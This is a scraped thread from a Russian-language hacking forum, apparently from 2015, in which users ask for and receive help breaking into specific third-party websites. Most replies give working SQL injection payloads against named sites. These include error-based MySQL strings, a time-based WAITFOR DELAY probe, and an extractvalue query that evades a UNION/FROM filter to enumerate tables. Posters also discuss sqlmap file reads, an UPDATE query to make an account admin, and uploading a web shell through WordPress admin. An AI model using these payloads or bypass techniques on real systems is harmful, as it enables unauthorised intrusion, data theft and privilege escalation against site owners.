ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.05.2015, 03:55
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от kacergei
kacergei said:
↑
Имеется сайт с sql-injections, но возникли впоросы с sqlmap
Код:
Code:
[Linux Debian] [Apache 2.4.10] [MySQL 5.0] ['10.0.16-MariaDB-1']
Privilege: USAGE
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload: http://site.com/news.html?id=(SELECT 1582 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1582=1582,1))),0x71706b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&cat=main
Не работает --file-read="/home/www/wwuser/user/www/index.php" (или тот же .htaccess, js не важно)
Выдает пустой файл:
Spoiler: Результат
Код:
Code:
[WARNING] reflective value(s) found and filtering out
[INFO] retrieved:
[WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
files saved to [1]:[*] C:\sqlmap\output\site.com\files\_home_www_wwuser_user_www_index.php (size differs from remote file)
И тот же вопрос по --sql-query="UPDATE users SET admin=1 WHERE login=test" (как только не пробовал)
Spoiler: Результат
Код:
Code:
[WARNING] execution of custom SQL queries is only available when stacked queries are supported
UPDATE UPDATE users SET admin=1 WHERE login=test: None
[INFO] fetched data logged to text files under 'C:\sqlmap\output\site.com\'
Это из-за нехватки прав? Или что то другое мешает? ну как бы для чтения файлов у вашего пользователя должны быть права file_priv, а для update в mysql нужна sqli в update. тут разделяются запросы на выборку и на изменение информации
|
|
|
13.05.2015, 11:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
56887
Репутация:
28
|
|
Доброго дня...
Есть LFI подскажет кто?
Код HTML:
HTML:
goo.gl/d1mQnC
|
|
|
|
13.05.2015, 13:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Код:
Code:
http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993'
помогите с раскруткой |
|
|
|
13.05.2015, 13:38
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от vikler
vikler said:
↑
Код:
Code:
http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993'
помогите с раскруткой
Код:
Code:
http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993%27;WAITFOR%20DELAY%20%270:0:1%27--
|
|
|
|
13.05.2015, 13:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Сообщение от faza02
faza02 said:
↑
Код:
Code:
http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993%27;WAITFOR%20DELAY%20%270:0:1%27--
Incorrect syntax near '; WAITFOR DELAY'.
|
|
|
|
13.05.2015, 14:28
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от vikler
vikler said:
↑
Incorrect syntax near '; WAITFOR DELAY'. тем не менее, задержка есть. попробуйте 0 и 1
|
|
|
|
13.05.2015, 16:16
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
www.haba.ch/?id_mitteilungeneintraege=-77+/*!12345union*/+%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+&typ=4
Как обойти фильтр from? таблица be_users
|
|
|
|
13.05.2015, 16:36
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от DezMond™
DezMond™ said:
↑
www.haba.ch/?id_mitteilungeneintraege=-77+/*!12345union*/+%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+&typ=4
Как обойти фильтр from? таблица be_users
Сообщение от DezMond™
DezMond™ said:
↑
www.haba.ch/?id_mitteilungeneintraege=-77+/*!12345union*/+%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+&typ=4
Как обойти фильтр from? таблица be_users
Код:
Code:
http://o53xo.nbqweyjomnua.cmle.ru/?id_mitteilungeneintraege=-77+and%28extractvalue%281,/*!concat*/%280x3a,%28select+table_name+from+information_schema.tables+limit+1,1%29%29%29%29&typ=4
реакция на связку union select from. select from пропускает, поэтому здесь подходит error-based
|
|
|
|
14.05.2015, 01:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Какие способы заливки шелла через wpadmin, если там а) отключено редактирование тем и плагинов б) невозможно загружать php ?
|
|
|
|
14.05.2015, 01:52
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от vikler
vikler said:
↑
Какие способы заливки шелла через wpadmin, если там а) отключено редактирование тем и плагинов б) невозможно загружать php ? архив с темой тоже нельзя загрузить? какая версия wp?
из этой темы все попробовали? https://rdot.org/forum/showthread.php?t=3
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
